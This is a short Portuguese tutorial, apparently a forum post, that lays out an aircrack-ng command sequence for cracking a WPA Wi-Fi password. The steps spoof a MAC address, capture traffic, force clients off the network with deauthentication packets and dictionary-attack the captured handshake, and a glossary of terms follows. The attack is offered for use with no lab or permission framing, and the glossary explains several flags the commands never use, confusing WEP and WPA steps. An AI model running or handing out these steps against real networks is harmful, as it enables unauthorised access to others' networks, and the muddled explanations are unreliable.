termos de como se invade uma rede wireless
Exemplo de como descobrir a password de uma rede Wifi WPA:
~# airmon-ng start wlan0
~# ifconfig mon0 down
~# macchanger -m 00:11:22:33:44:55 mon0
~# ifconfig mon0 up
~# airodump-ng
~# airodump-ng -c (canal) --bssid (bssid) -w (Nome_do_Ficheiro) mon0
~# aireplay-ng -0 30 -a (bssid) -c (station) mon0
~# aircrack-ng -w (dicionarip) (.cap file_name)
Entendam os termos:
- airmon – Uma ferramenta que põem o vosso dispositivo wireless em modo de escuta.
- airodump – Uma ferramenta para capturar pacotes a partir de um router wireless.
- aireplay – uma ferramenta para forjar requisições ARP
- aircrack – Uma ferramenta para desencriptar chaves WEP
- iwconfig –
Uma ferramenta para configurar placas wireless. Poderá-se verificar
com esta ferramenta que a nossa placa wireless está em modo de escuta.
- macchanger – Uma ferramenta que nos permite modificar o nosso enderenço MAC.
- AP: Ponto de acesso de um router wireless.
- MAC Address:
Media Access Control address, Um identificador único atribuído a
routers e placas. Vem no formato hexadecimal (exemplo
00:11:ef:22:a3:6a).
- BSSID: endereço MAC do Ponto de Acesso (Router)
- ESSID: Nome do ponto de acesso (Router).
- WEP: Significa: Wired Equivalency Privacy. È um protocolo de segurança para redes Wi-Fi
- WPA: Significa: WiFi Protected Access. um protocolo mais seguro que o WEP para redes sem fio.
- -w diz ao airodump para escrever o ficheiro.
- CH é o canal do alvo.
- 1 diz airodump para recolher apenas IVS – os pacotes de dados com a chave WEP.
- -1 No
início especifica o tipo de ataque. Neste caso, queremos autenticação
falsa. Você pode ver todas as opções, digitando aireplay-ng –h
- 0 Especifica o tempo entre ataques
- -e é o (nome) essid. belkin é o nome essid ou transmissão do meu alvo. Linksys ou padrão são outros nomes comuns na essid.
- -a é o endereço MAC do alvo.
- -h é o vosso enderenço MAC. Podem ver ou modifica-lo com macchanger.
- mon0 é o nome da vossa placa criada para escutar os pacotes
- ########################### Marrocamp ##############################